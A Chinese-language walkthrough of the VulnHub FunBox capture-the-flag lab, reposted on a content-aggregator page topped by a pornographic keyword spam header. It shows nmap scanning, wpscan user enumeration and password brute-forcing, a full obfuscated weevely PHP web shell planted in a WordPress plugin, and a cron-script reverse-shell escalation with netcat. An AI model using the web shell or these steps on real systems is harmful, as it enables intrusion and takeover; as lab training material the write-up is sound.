日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

VulnHub FunBox Writeup

發布時間:2024/1/18 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 VulnHub FunBox Writeup 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

FunBox詳情請見:https://www.vulnhub.com/entry/funbox-1,518/

靶機使用VirtualBox搭建,連接VirtualBox Host-Only網卡,IP為:192.168.56.101

攻擊機是VMware下的一臺Kali,使用橋接模式,橋接至VirtualBox Host-Only網卡,IP為:192.168.56.177


Nmap掃描C段內存活主機

nmap -sP 192.168.56.1/24


發現靶機IP:192.168.56.101
掃描開放端口服務及啟用操作系統檢測,版本檢測,腳本掃描和跟蹤路由

nmap -A -sT 192.168.56.101

訪問192.168.56.101發現被301重定向跳轉到http://funbox.fritz.box/


修改攻擊機/etc/hosts,增加一條

192.168.56.101 funbox.fritz.box


即可正常訪問


在之前的Nmap掃描得知這是WordPress 5.4.2的站,使用WPscan枚舉用戶

wpscan --url http://funbox.fritz.box/ --enumerate u


使用WPscan爆破用戶密碼,字典為Kali自帶字典(加了些平常自己收集的一些密碼)/usr/share/wordlists/dirb/big.txt

wpscan --url http://funbox.fritz.box/ -P /usr/share/wordlists/dirb/big.txt --max-threads 100


admin用戶登錄后臺可直接修改插件內容(修改的插件內容需要先關閉使用狀態)


使用weevely生成一個PHP木馬

<?php $d='p://input"!F),$m!F)==1!F) {@ob_star!Ft();@e!Fval(@!Fgzuncom!Fpres!Fs(!F@x(@base!F64_!Fdecode(!F$m[1]),$k)))!F;!F!F$'; $k=str_replace('Mu','','MucreaMutMuMueMuMu_function'); $f='i++){$o.=$t!F{$i}^$k{$j};}}r!Feturn $!Fo;}!F!Fif (@preg!F_match("/$kh(!F.+)$!Fkf/",@f!File_!Fget_con!Ftent!Fs("ph!F'; $O='o=@ob_get_conte!Fnts();@!Fob_en!Fd_cl!Fean()!F;$r=!F@b!Fase64_en!Fcode(@x(@gzco!F!Fmpr!Fess!F($o),!F$k!F));print("$p$kh$r$kf");}'; $Q='$k){$c=strlen($k)!F!F;$l=st!Frlen!F($t!F)!F;!F$o="";for($i=!F0;$i<!F$l;){for($j=0;($j<!F$c&&$i<!F$l);$!Fj+!F+,!F$!F'; $s='$k=!F"bc5682e!F4";$k!Fh="f!F!F0bfbabfef4d";$kf="!Faeaab!F562!Fae!Fd!F7";$p="vsHQV!FqAVJ0T!FRXxRB";funct!Fion !F!Fx($!Ft,'; $w=str_replace('!F','',$s.$Q.$f.$d.$O); $I=$k('',$w);$I(); ?>

寫入http://funbox.fritz.box/wp-content/plugins/akismet/index.php,weevely連接

weevely http://funbox.fritz.box/wp-content/plugins/akismet/index.php seanz7


cat /etc/passwd發現還存在兩個用戶funny和joe,其中joe可以直接使用之前爆破出來的密碼直接ssh登錄

PS:www-data權限要比joe權限更大一點


在/home/funny目錄下發現兩個.sh文件


.reminder.sh

系統不定時運行.backup.sh,并且當前用戶對.backup.sh擁有所有權限


.backup.sh

那就可以通過修改.backup.sh的內容為nc反彈,當root或者其他用戶執行直接反彈一個root或者比當前用戶權限更高的用戶shell

修改內容如下

攻擊機直接監聽

nc -lvp 1234

funny用戶每兩分鐘執行一次
root用戶每五分鐘執行一次

所以要彈到root的shell還是挺看運氣的,得多嘗試

總結

以上是生活随笔為你收集整理的VulnHub FunBox Writeup的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。